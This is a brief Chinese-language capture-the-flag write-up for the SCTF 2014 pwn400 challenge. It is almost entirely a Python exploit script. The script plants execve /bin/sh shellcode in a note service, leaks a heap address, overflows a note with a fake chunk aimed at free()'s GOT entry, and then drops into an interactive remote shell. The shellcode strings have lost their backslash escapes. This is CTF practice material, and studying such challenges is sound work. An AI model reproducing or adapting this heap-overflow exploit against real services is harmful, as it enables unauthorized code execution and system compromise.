这个题目在这个链接中分析得很透彻,不再多余地写了。http://bruce30262.logdown.com/posts/245613-sctf-2014-pwn400
exploit:
from socket import * import struct import time shellcode = "x90x90x90x90x90x90"+"xebx08"+"AAAA"+"x90"*10+"x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x59x50x5axb0x0bxcdx80" sock = socket(AF_INET, SOCK_STREAM) sock.connect(("192.168.200.7", 10001)) time.sleep(1) print sock.recv(1024) #new two note: 2, 1 for i in xrange(2): sock.send('1 ') time.sleep(1) sock.recv(1024) sock.send(str(i+1) + ' ') time.sleep(1) sock.recv(1024) sock.send(str(i+1) + ' ') time.sleep(1) sock.recv(1024) sock.send(str(i+1) + ' ') time.sleep(1) sock.recv(1024) #new the third note: 3 sock.send('1 ') time.sleep(1) sock.recv(1024) sock.send('3 ') time.sleep(1) sock.recv(1024) sock.send('3 ') time.sleep(1) sock.recv(1024) time.sleep(1) #store shellcode in note 3 sock.send(shellcode+" ") #get the note 1's address sock.send('3 ') time.sleep(1) print sock.recv(100) sock.send('1 ') time.sleep(1) note1_addr = sock.recv(2048) while note1_addr.find('location:') == -1: note1_addr += sock.recv(2048) print note1_addr note1_addr = note1_addr[note1_addr.find('location:') + 11:] note1_addr = note1_addr[:note1_addr.find(' ')] addr1 = int(note1_addr, 16) print addr1 #note 2's address addr2 = addr1 + 0x170 #note 3's address addr3 = addr2 + 0x170 #shellcode's address addr_shellcode = struct.pack("<I", addr3 + 0x6c) #free()'s Got: 0x0804a450 exploit = "A"*256+"BBBB"+struct.pack("<I",addr2)+addr_shellcode+"x4cxa4x04x08" #edit note 1 sock.send("4 ") time.sleep(1) print sock.recv(1024) sock.send("1 ") time.sleep(1) print sock.recv(1024) sock.send(exploit+" ") time.sleep(1) print sock.recv(1024) #delete node 2 sock.send("5 ") time.sleep(1) sock.recv(1024) time.sleep(1) sock.send(hex(addr2)[2:10]+' ') time.sleep(1) sock.recv(1024) while True: sock.send(raw_input('$ ') + ' ') time.sleep(1) temp = sock.recv(2048) print temp